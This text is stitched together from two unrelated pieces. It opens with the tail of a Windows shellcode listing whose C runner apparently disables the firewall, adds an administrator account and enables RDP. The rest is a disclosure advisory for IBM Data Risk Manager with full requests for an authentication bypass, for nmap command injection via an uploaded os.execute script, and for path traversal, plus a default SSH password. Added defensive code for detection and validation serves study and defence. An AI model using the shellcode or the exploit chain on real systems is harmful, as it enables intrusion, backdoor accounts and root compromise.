"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";

int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}
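As an added defensive example (not part of the shellcode author's submission), the Python below correlates the five commands listed in the header comments above as they would surface in process-creation telemetry. The event records and command lines are constructed, the host and parent names are placeholders, and the firewall pattern also covers the `netsh advfirewall ... state off` form, which goes beyond the `netsh firewall` form the shellcode uses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events shaped like Sysmon Event ID 1 fields
# (not real telemetry). WS01 reproduces the five-command sequence spawned by a
# non-interactive parent; WS02 shows a lone, help-desk style account creation.
SAMPLE_EVENTS = [
    {"ts": "2020-04-20T13:00:01", "host": "WS01", "parent": "C:\\app\\vulnsvc.exe",
     "cmd": 'cmd.exe /c netsh firewall set opmode mode=DISABLE'},
    {"ts": "2020-04-20T13:00:01", "host": "WS01", "parent": "C:\\app\\vulnsvc.exe",
     "cmd": 'cmd.exe /c net user svc_helper Placeh0lder! /add'},
    {"ts": "2020-04-20T13:00:02", "host": "WS01", "parent": "C:\\app\\vulnsvc.exe",
     "cmd": 'cmd.exe /c net localgroup Administrators svc_helper /add'},
    {"ts": "2020-04-20T13:00:02", "host": "WS01", "parent": "C:\\app\\vulnsvc.exe",
     "cmd": 'cmd.exe /c net localgroup "Remote Desktop Users" svc_helper /add'},
    {"ts": "2020-04-20T13:00:03", "host": "WS01", "parent": "C:\\app\\vulnsvc.exe",
     "cmd": 'cmd.exe /c reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"ts": "2020-04-20T14:10:00", "host": "WS02", "parent": "C:\\Windows\\explorer.exe",
     "cmd": 'net user jdoe Welcome-2020 /add'},
]

# One regex per step of the sequence; net1.exe is matched as well as net.exe.
PATTERNS = {
    "firewall_disable": re.compile(
        r"\bnetsh(\.exe)?\s+(firewall\s+set\s+opmode\s+mode=disable"
        r"|advfirewall\s+set\s+\w+\s+state\s+off)", re.I),
    "local_user_add": re.compile(
        r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I),
    "admin_group_add": re.compile(
        r'\bnet1?(\.exe)?\s+localgroup\s+"?administrators"?\s+\S+\s+/add\b', re.I),
    "rdp_group_add": re.compile(
        r'\bnet1?(\.exe)?\s+localgroup\s+"remote desktop users"\s+\S+\s+/add\b', re.I),
    "rdp_enable": re.compile(
        r"\breg(\.exe)?\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I),
}


def classify(cmd):
    """Return the set of sequence steps a single command line matches."""
    return {name for name, rx in PATTERNS.items() if rx.search(cmd)}


def correlate(events, window=timedelta(minutes=5), min_steps=3):
    """Group matching commands per host inside a sliding window and alert when at
    least `min_steps` distinct steps occur together. Returns {host: sorted steps}."""
    per_host = defaultdict(list)
    for ev in events:
        steps = classify(ev["cmd"])
        if steps:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), steps))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set()
            for ts, steps in hits[i:]:
                if ts - start > window:
                    break
                seen |= steps
            if len(seen) >= min_steps:
                alerts[host] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for host, steps in correlate(SAMPLE_EVENTS).items():
        print(host, steps)
```

A single account creation (WS02) stays below the threshold; the value of the rule is the co-occurrence of firewall, account, group and RDP changes from one parent within seconds.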



IBM Data Risk Manager Authentication Bypass / Command Injection / File Download


IBM Data Risk Manager suffers from authentication bypass, command injection, insecure default password, and arbitrary file download vulnerabilities.


MD5 | ec8fbc1af9abc04b69ed7066a766acb9

# Multiple Vulnerabilities in IBM Data Risk Manager

### By Pedro Ribeiro (pedrib@gmail.com) from [Agile Information Security](https://agileinfosec.co.uk)

#### Disclosure Date: 21/04/2020 | Last Updated: 21/04/2020

## Introduction
[From the vendor's website](https://www.ibm.com/products/data-risk-manager):
*What you don’t know can hurt you. Identify and help prevent risks to sensitive business data that may impact business processes, operations, and competitive position. IBM Data Risk Manager provides executives and their teams a business-consumable data risk control center that helps to uncover, analyze, and visualize data-related business risks so they can take action to protect their business.*

## Summary
**tl;dr scroll to the bottom to see videos of the exploits in action**

IBM Data Risk Manager (IDRM) is an enterprise security software by IBM that aggregates and provides a full view of all the enterprise security risks, akin to an electronic risk register.
The product receives information feeds from vulnerability scanning tools and other risk management tools, aggregates them and allows a user to investigate them and perform comprehensive analysis.

The IDRM Linux virtual appliance was analysed and it was found to contain four vulnerabilities, three critical risk and one high risk:

* Authentication Bypass
* Command Injection
* Insecure Default Password
* Arbitrary File Download

This advisory describes the four vulnerabilities and the steps necessary to chain the first three to achieve unauthenticated remote code execution as root. In addition, two Metasploit modules that bypass authentication and exploit the [remote code execution](https://github.com/rapid7/metasploit-framework/pull/13300) and [arbitrary file download](https://github.com/rapid7/metasploit-framework/pull/13301) are being released to the public.

At the time of disclosure, it is unclear if the latest version 2.0.6 is affected by these, but most likely it is, as there is no mention of fixed vulnerabilities in any changelog, and it was released before the *attempt* to report these vulnerabilities to IBM. The latest version Agile InfoSec has access to is 2.0.3, and that one is certainly vulnerable.

### Here's a bunch of 0 days!

At the time of disclosure these vulnerabilities are **"0 days"**. An attempt was made to contact [CERT/CC](https://www.kb.cert.org/vuls/) to coordinate disclosure with IBM, but IBM **REFUSED** to accept the vulnerability report, and responded to CERT/CC with:

***we have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for "enhanced" support paid for by our customers**. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.*

This is an unbelievable response by IBM, a multi billion dollar company that is **selling security enterprise products and security consultancy** to huge corporations worldwide. They refused to accept a free high quality vulnerability report on one of their products, while putting ludicrous quotes like the following [on their website](https://www.ibm.com/security):

*When every second counts, you need a unified defense to identify, orchestrate and automate your response to threats. IBM Security Threat Management solutions help you thrive in the face of cyber uncertainty.*

*Building a custom security plan that is both industry-specific and aligned to your security maturity demands a partner with deep expertise and global reach. The IBM Security Strategy and Risk services team is that valued partner.*

It should be noted that IBM offers no bounties on their "bug bounty program", just kudos:

![Kudos](./kudos.jpeg)

In any case, I did not ask or expect a bounty since I do not have a HackerOne account and I don't agree with HackerOne's or IBM's disclosure terms there.
I simply wanted to disclose these to IBM responsibly and let them fix it.

### So many questions...
IDRM is an enterprise security product that handles very sensitive information. The hacking of an IDRM appliance might lead to a full scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.

* Why did IBM refuse to accept a **FREE** detailed vulnerability report?
* What does their answer mean? Are they only accepting vulnerability reports from customers?
* Or is the product out of support? If so, why is it still being offered for sale to new customers?
* How can they be so irresponsible while selling an enterprise security product?

Anyway, with this out of the way let's get technical...

## Vulnerability Details

### #1: Authentication Bypass
* [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: None / N/A
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
IDRM has an API endpoint at */albatross/saml/idpSelection* that associates an ID provided by the attacker with a valid user on the system. The method that handles this endpoint is shown below:

```java
@RequestMapping(value={"/saml/idpSelection"}, method={RequestMethod.GET})
public String idpSelection(HttpServletRequest httpRequest, HttpServletResponse httpResponse, Model model, @RequestParam(value="id", required=false) String sessionId, @RequestParam(value="userName", required=false) String userName, RedirectAttributes rattrs) {
    List allUrls = this.a3repository.getA3AllUrlsRepository().findByTypeAndIsDeletedAndGuardiumType(A3Constants.A3_URL_TYPE.MICROSERVICES.getValue(), A3Constants.INT_ZERO, A3Constants.A3_MICROSERVICE_TYPE.IDENTITY_MANAGER.getValue());
    if (allUrls == null || allUrls.size() == 0) {
        rattrs.addAttribute("message", (Object)"Microservice instance is not running or more than one instance is running, please start the microservice and try again");
        return "redirect:/error";
    }
    if (allUrls.size() == 1) {
        A3AllUrls aUrl = (A3AllUrls)allUrls.get(0);
        String url = aUrl.getUrl();
        if (userName == null || userName.equals("")) {
            rattrs.addAttribute("message", (Object)"Enter the user name, please try again");
            return "redirect:/error";
        }
        if (sessionId == null || sessionId.equals("")) {
            rattrs.addAttribute("message", (Object)"Session ID is not present, please try again");
            return "redirect:/error";
        }
        A3User user = this.a3repository.getA3userService().findA3UserByUserNameIgnoreCaseAndIsDeleted(userName, A3Constants.INT_ZERO);
        if (user == null) {
            rattrs.addAttribute("message", (Object)("User " + userName + " account not present in IDRM, please create the account and try again"));
            return "redirect:/error";
        }
        user.setSessionId(sessionId);
        user.setLastUpdate(null);
        this.a3repository.getA3userService().save((Object)user);
        String page = null;
        page = url.endsWith("/") ? "redirect:" + url + "saml/idpSelection" : "redirect:" + url + "/saml/idpSelection";
        return page;
    }
    return "redirect:/error";
}
```

As can be seen in the code above, this method accepts arbitrary *sessionId* and *username* parameters from the HTTP request, and if *username* exists in the application's user database, it associates that *sessionId* with the *username*.
This can be achieved by an unauthenticated attacker with the following request:
```
GET /albatross/saml/idpSelection?id=SOMETHING&userName=admin
```

The server will respond with a 302 redirect to https://localhost:8765/saml/idpSelection, but that doesn't really matter. This action might not make sense now, but read on.

The API endpoint */albatross/user/login* is handled by the following method (only the relevant snippets are shown):
```java
@RequestMapping(value={"/user/login"}, method={RequestMethod.POST}, consumes={"multipart/form-data"})
public A3StatusBean userLogin(HttpServletRequest httpRequest, @RequestParam(value="username", required=true) String username, @RequestParam(value="deviceid") String deviceId, @RequestParam(value="password", required=false) String password, @RequestParam(value="sessionId", required=false) String sessionId, @RequestParam(value="clientDetails", required=true) String clientDetails) {
    (...)
    A3User user = this.a3repository.getA3userService().findA3UserByUserNameIgnoreCase(username);
    if (user != null) {
        if (sessionId != null) {
            if (sessionId.equals(user.getSessionId())) {
                (...)
                LOGGER.log(A3Constants.A3LOG, "Session is matching, so user is valid");
                response.setRequestedUrl(A3Utils.getWebURLWithQueryString((HttpServletRequest)httpRequest));
                response.setHttpStatus(Integer.toString(HttpStatus.OK.value()));
                response.setServerCode(Integer.toString(A3FullStackResponseConstants.SUCCESS));
                if (this.userMap.get(user.getUserId()) == null) {
                    user.setSessionId(null);
                    String randomPwd = UUID.randomUUID().toString();
                    user.setPassword(A3BcryptUtil.getBCryptHash(randomPwd));
                    this.a3repository.getA3userService().save((Object)user);
                    this.userMap.put(user.getUserId(), randomPwd);
                    response.setData((Object)randomPwd);
                } else {
                    String tPassword = this.userMap.get(user.getUserId());
                    user.setPassword(A3BcryptUtil.getBCryptHash(tPassword));
                    this.a3repository.getA3userService().save((Object)user);
                    response.setData((Object)tPassword);
                }
                return response;
            }
    (...)
}
```

The method listed above takes the *username* and *sessionId* parameters, and checks if *username* exists in the database and *sessionId* is associated with that *username*. If it is, the application returns a newly generated random password for that username.
In the previous request, the *"admin"* user was associated with the *sessionId* *"SOMETHING"*. So now if we perform the following request:
```
POST /albatross/user/login HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_224_2171658712_4042463386
Content-Length: 509
Connection: close

--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="deviceid"


--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="password"

< ... any string can be sent here ... >
--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="username"

admin
--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="clientDetails"


--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="sessionId"

SOMETHING
--_Part_224_2171658712_4042463386--

```

The server will respond with:
```
{"httpStatus":"200","serverCode":"2001","requestedUrl":"https://10.0.10.25:8443/albatross/user/login","data":"b6e1a82b-3f33-4297-86e1-ca780d16cb02"}
```

... which is now a valid password for the *"admin"* user, as the previous snippet of code shows.

So now let's try and authenticate using that as a password:
```
POST /albatross/user/login HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_122_4062871012_3985537084
Content-Length: 435
Connection: close

--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="deviceid"


--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="password"

b6e1a82b-3f33-4297-86e1-ca780d16cb02
--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="username"

admin
--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="clientDetails"


--_Part_122_4062871012_3985537084--
```

To which the server responds with:
```
{"httpStatus":"200","serverCode":"2001","requestedUrl":"https://10.0.10.25:8443/albatross/user/login","data":{"access_token":"3b5b0fa6-2d46-4104-ba38-54a077d05a93","token_type":"bearer","expires_in":28799,"scope":"read write"}}
```

Success! We now have a valid administrative Bearer token that can be used to access various APIs. It's also possible to log in as a normal web user on the */albatross/login* endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console. In any case, as this shows, authentication is now completely bypassed and we have full administrative access to IDRM.

It should be noted that this is a destructive action - the previous admin password will be invalid, and only the new password which is generated above can be used to login as an admin. So this works a bit like a *"password reset"*, even though it is not named as such.
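The two-step sequence above leaves a recognisable trace in the reverse proxy or Tomcat access log: a GET to */albatross/saml/idpSelection* carrying both *id* and *userName*, followed shortly by POSTs to */albatross/user/login* from the same client. As an added detection example (not part of this advisory or of IDRM), the Python below runs that correlation over constructed combined-format log lines; the IPs, timestamps and the 10-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined format (not taken from the advisory).
# 10.0.10.99 performs the idpSelection -> user/login sequence; 10.0.10.50 hits
# idpSelection without userName, which the handler rejects, so it must not be flagged.
SAMPLE_LOG = """\
10.0.10.7 - - [21/Apr/2020:10:00:01 +0000] "GET /albatross/login HTTP/1.1" 200 5120
10.0.10.99 - - [21/Apr/2020:10:02:10 +0000] "GET /albatross/saml/idpSelection?id=SOMETHING&userName=admin HTTP/1.1" 302 0
10.0.10.99 - - [21/Apr/2020:10:02:11 +0000] "POST /albatross/user/login HTTP/1.1" 200 146
10.0.10.99 - - [21/Apr/2020:10:02:12 +0000] "POST /albatross/user/login HTTP/1.1" 200 212
10.0.10.50 - - [21/Apr/2020:10:30:00 +0000] "GET /albatross/saml/idpSelection?id=abc HTTP/1.1" 302 0
10.0.10.50 - - [21/Apr/2020:11:30:00 +0000] "POST /albatross/user/login HTTP/1.1" 200 212
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

IDP_PATH = "/albatross/saml/idpSelection"
LOGIN_PATH = "/albatross/user/login"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs returns lists; keep the first value of each parameter.
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def detect_idp_session_bypass(lines, window=timedelta(minutes=10)):
    """Flag idpSelection calls that carry both id and userName and are followed,
    from the same client within `window`, by POSTs to /albatross/user/login.

    Returns one alert per suspicious idpSelection call."""
    records = [r for r in (parse_line(l) for l in lines) if r]
    records.sort(key=lambda r: r["ts"])
    alerts = []
    for i, rec in enumerate(records):
        if rec["method"] != "GET" or rec["path"] != IDP_PATH:
            continue
        # The vulnerable handler only binds the session id when both params are present.
        if "id" not in rec["query"] or not rec["query"].get("userName"):
            continue
        deadline = rec["ts"] + window
        logins = [
            r for r in records[i + 1:]
            if r["client"] == rec["client"]
            and r["method"] == "POST"
            and r["path"] == LOGIN_PATH
            and r["ts"] <= deadline
        ]
        if logins:
            alerts.append({
                "client": rec["client"],
                "target_user": rec["query"]["userName"],
                "first_seen": rec["ts"].isoformat(),
                "login_attempts": len(logins),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_idp_session_bypass(SAMPLE_LOG.splitlines()):
        print(alert)
```

Because the bypass resets the target account's password, an alert for the *admin* user should also prompt a check of whether the previous administrative credentials still work.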


### #2: Command Injection
* [CWE-77: Command Injection](https://cwe.mitre.org/data/definitions/77.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: Authentication Required
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
IDRM exposes an API at */albatross/restAPI/v2/nmap/run/scan* that allows an authenticated user to perform nmap scans. The call stack and the relevant code are pasted below:

```java
@RequestMapping(value={"/run/nmap/scan"}, method={RequestMethod.POST})
public A3StatusBean runNmapScan(HttpServletRequest httpRequest, @RequestParam(value="transaction", required=false) String transactionData, @RequestParam(value="accessToken") String accessToken, @RequestParam(value="userId", required=false) String userName) {

(...)
runNmapScan invokes A3CustomScriptScanTask.run()

A3CustomScriptScanTask.run() invokes A3IpScannerUtils.runNmapOnIpAddress()

public static A3ExtAppNmapHostDTO runNmapOnIpAddress(String nmapPath, String nmapOptions, String ipAddress, String portRange) throws IOException, InterruptedException {
    String[] nmapOpts;
    A3ExtAppNmapHostDTO nmapHost = null;
    LOGGER.log(A3EurekaConstants.OPERATIONAL, "Running nmap Scan");
    ArrayList<String> command = new ArrayList<String>();
    command.add(nmapPath);
    for (String nmapOpt : nmapOpts = nmapOptions.split("")) {
        command.add(nmapOpt);
    }
    command.add(ipAddress);
    Process process = null;
    if (portRange != null && !portRange.equals("")) {
        command.add("-p");
        command.add(portRange);
        process = Runtime.getRuntime().exec(command.toArray(new String[command.size()]));
    } else {
        process = Runtime.getRuntime().exec(command.toArray(new String[command.size()]));

        (...)
    }
    (...)
}
```
As listed in [GTFObins](https://gtfobins.github.io/gtfobins/nmap), having access to nmap allows running arbitrary commands if we can upload a script file and then pass that as an argument to nmap with *"--script=<FILE\>"*. Looking at the code above, *ipAddress* looks like a good candidate for this.

However, to achieve code execution in this way we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to *"/home/a3user/agile3/patches/<FILE\>"*. The method is too long and verbose to paste here, but it is supposed to accept a patch file, process it and apply it.
There are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.

In order to upload a file, we simply need to send the following request:
```
POST /albatross/upload/patch HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: JSESSIONID=D68124D3EFD66417B4C6B0950E1891C0;
CSRF-TOKEN: 4f88a837-5f12-4d15-a0d5-57b24de17176
Content-Type: multipart/form-data; boundary=_Part_387_3982485447_258275719
Content-Length: 330
Connection: close

--_Part_387_3982485447_258275719
Content-Disposition: form-data; name="patchFiles"; filename="owned.enc"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

os.execute("/usr/bin/whoami > /tmp/testing")
--_Part_387_3982485447_258275719--
```
The server will respond with a 200 OK but will include a JSON message saying an error has occurred. This is irrelevant, as the file was still uploaded to disk.
Finally we inject our parameters and run nmap with the following request:
```
POST /albatross/restAPI/v2/nmap/run/scan/18 HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Bearer 3b5b0fa6-2d46-4104-ba38-54a077d05a93
Content-Type: multipart/form-data; boundary=_Part_841_3176682485_2250831758
Content-Length: 440
Connection: close

--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="clientDetails"


--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="type"

1
--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="portRange"


--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="ipAddress"

--script=/home/a3user/agile3/patches/owned.enc
--_Part_841_3176682485_2250831758--
```
This will execute *"nmap --script=/home/a3user/agile3/patches/owned.enc"* and run our command:
```
[a3user@idrm-server ~]$ cat /home/a3user/agile3/patches/owned.enc
os.execute("/usr/bin/whoami > /tmp/testing")
[a3user@idrm-server ~]$ cat /tmp/testing
a3user
```
Note that all of these requests require an authenticated session as an administrator - but as shown in #1, this can be easily bypassed. The actual flow to achieve full unauthenticated remote code execution is a bit more convoluted, as we need to authenticate to both the web interface and the API, but the basic workings have been described above.
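As an added defensive example (not part of the advisory or of IBM's code), the following Python shows the input validation the nmap endpoint lacks: the *ipAddress* value is accepted only when it parses as an IP address, CIDR range or hostname, and a leading dash is refused outright so the value can never be consumed by nmap as an option. The port-range check and the argv builder are assumptions about how such an endpoint would invoke nmap.

```python
import ipaddress
import re

# Hostname labels: letters, digits and hyphens, never starting or ending with
# a hyphen, at most 63 characters each and 253 in total (RFC 1123 rules).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_safe_scan_target(value):
    """True only if value is a single IP address, CIDR range or hostname.

    A leading '-' is rejected first, so a value such as
    '--script=/home/a3user/agile3/patches/owned.enc' can never reach nmap
    in the target slot, where it would be parsed as an option.
    """
    value = value.strip()
    if not value or value.startswith("-") or any(c.isspace() for c in value):
        return False
    try:
        ipaddress.ip_network(value, strict=False)  # 10.0.10.25 or 10.0.10.0/24
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(value) is not None


def build_nmap_argv(ip_address, port_range=""):
    """Return the argv list for the scan, or raise ValueError.

    The list form is meant for subprocess.run(argv) without a shell, so the
    only thing nmap ever sees in the target slot is the validated value.
    """
    if not is_safe_scan_target(ip_address):
        raise ValueError("rejected scan target: %r" % ip_address)
    if port_range and not re.fullmatch(r"\d{1,5}(-\d{1,5})?", port_range):
        raise ValueError("rejected port range: %r" % port_range)
    argv = ["nmap"]
    if port_range:
        argv += ["-p", port_range]
    argv.append(ip_address)
    return argv


if __name__ == "__main__":
    # The value from the advisory's request body next to a legitimate target.
    for candidate in ("10.0.10.25", "--script=/home/a3user/agile3/patches/owned.enc"):
        verdict = "accepted" if is_safe_scan_target(candidate) else "rejected"
        print("%s -> %s" % (candidate, verdict))
```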


### #3: Insecure Default Password
* [CWE-798: Use of Hard-coded Credentials](https://cwe.mitre.org/data/definitions/798.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: None / N/A
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
The administrative user in the IDRM virtual appliance is *"a3user"*. This user is allowed to login via SSH and run sudo commands, and it is set up with a default password of *"idrm"*.

When combined with vulnerabilities #1 and #2, this allows an unauthenticated attacker to achieve remote code execution as root on the IDRM virtual appliance, leading to complete system compromise.

While IDRM forces the administrative user of the web interface (*"admin"*) to change its password upon first login, it does not require the same of *"a3user"*.

### #4: Arbitrary File Download
* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](https://cwe.mitre.org/data/definitions/22.html)
* CVE-TODO (not assigned yet)
* Risk Classification: High
* Attack Vector: Remote
* Constraints: Authentication Required
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.2 and 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:

IDRM exposes an API at */albatross/eurekaservice/fetchLogFiles* that allows an authenticated user to download log files from the system. However, the *logFileNameList* parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.
The code path is convoluted, and won't be shown here for brevity, but exploitation (and finding this flaw) is very simple:

```
POST /albatross/eurekaservice/fetchLogFiles HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.10.25:8443/albatross/home
Content-Type: application/json
CSRF-TOKEN: 93e0dbe1-88e5-450e-ab2c-7c614b709876
Content-Length: 93
Cookie: JSESSIONID=ABFFB7EB959FAC45743AC2889960DFD0
Connection: close

{"instanceId":"local_host","logLevel":"DEBUG","logFileNameList":"../../../../../etc/passwd,"}
```

Response:
```
HTTP/1.1 200
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Disposition: attachment; filename=ms_logs_admin.zip
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Content-Type: application/zip
Content-Length: 550
Date: Wed, 17 Oct 2018 11:46:45 GMT
Connection: close

<ZIP file containing /etc/passwd>
```
When combined with #1, this allows an unauthenticated attacker to download any file readable by *"a3user"* off the system.
Note that version 2.0.1 is not vulnerable, while versions higher than 2.0.1 are: on 2.0.1, attempting to download an arbitrary file using this method results in an HTTP 500 error with a *"File security exception"* message.
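An added example, not taken from the advisory or from the product, of how a *logFileNameList* parameter can be resolved safely in Python: each comma-separated entry must be a bare file name, and the normalised path must still sit directly under the log directory. The log directory path is an assumption, and the exception mirrors the *"File security exception"* the advisory reports for 2.0.1.

```python
import posixpath

# Assumed log directory; the advisory does not name the real one.
LOG_DIR = "/home/a3user/agile3/logs"


class FileSecurityException(Exception):
    """Raised for any name that does not stay inside LOG_DIR."""


def is_safe_log_name(name):
    """A log file name must be a bare file name: no separators, no traversal."""
    return (
        bool(name)
        and "/" not in name
        and "\\" not in name
        and "\x00" not in name
        and name not in (".", "..")
    )


def partition_log_names(log_file_name_list):
    """Split the comma separated parameter into (accepted, rejected) names.

    Empty entries (the advisory's payload ends with a comma) are skipped.
    A non-empty rejected list is what a request filter or log review should
    alert on: it is a traversal attempt, not a typo.
    """
    accepted, rejected = [], []
    for raw in log_file_name_list.split(","):
        name = raw.strip()
        if not name:
            continue
        (accepted if is_safe_log_name(name) else rejected).append(name)
    return accepted, rejected


def resolve_log_files(log_file_name_list, base_dir=LOG_DIR):
    """Map the parameter to absolute paths under base_dir, or raise.

    The dirname check is defence in depth: even if a name slipped past
    is_safe_log_name, a normalised path whose parent is not base_dir is refused.
    A real handler would additionally compare os.path.realpath() of the file
    against the directory to catch symlinks; omitted here so the example runs
    without the directory existing.
    """
    accepted, rejected = partition_log_names(log_file_name_list)
    if rejected:
        raise FileSecurityException("File security exception: %s" % ", ".join(rejected))
    base = posixpath.normpath(base_dir)
    paths = []
    for name in accepted:
        full = posixpath.normpath(posixpath.join(base, name))
        if posixpath.dirname(full) != base:
            raise FileSecurityException("File security exception: %s" % name)
        paths.append(full)
    return paths
```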

## Exploitation Summary
By combining vulnerabilities #1, #2 and #3, an unauthenticated user can achieve remote code execution as root. [A Metasploit module implementing this RCE chain was released](https://github.com/rapid7/metasploit-framework/pull/13300) and the asciinema clip below shows it in action:
[![asciicast](https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2.svg)](https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2)

If vulnerabilities #1 and #4 are combined, it's possible for an unauthenticated attacker to download arbitrary files off the system. [A second Metasploit module implementing this file download chain was released](https://github.com/rapid7/metasploit-framework/pull/13301), and the asciinema clip below shows it in action:
[![asciicast](https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp.svg)](https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp)


## Fix / Solutions:
IBM refused to acknowledge this vulnerability report, so it most likely won't fix these vulnerabilities. Make sure you uninstall the product so it does not endanger your network / company.

## Disclaimer
Please note that Agile Information Security (Agile InfoSec) relies on information provided by the vendor when listing fixed versions or products. Agile InfoSec does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so.
Unconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerabilities found by Agile Information Security are resolved properly.
Agile Information Security Limited does not accept any responsibility, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory. It is the vendor's responsibility to ensure their products' security before, during and after release to market.

## License
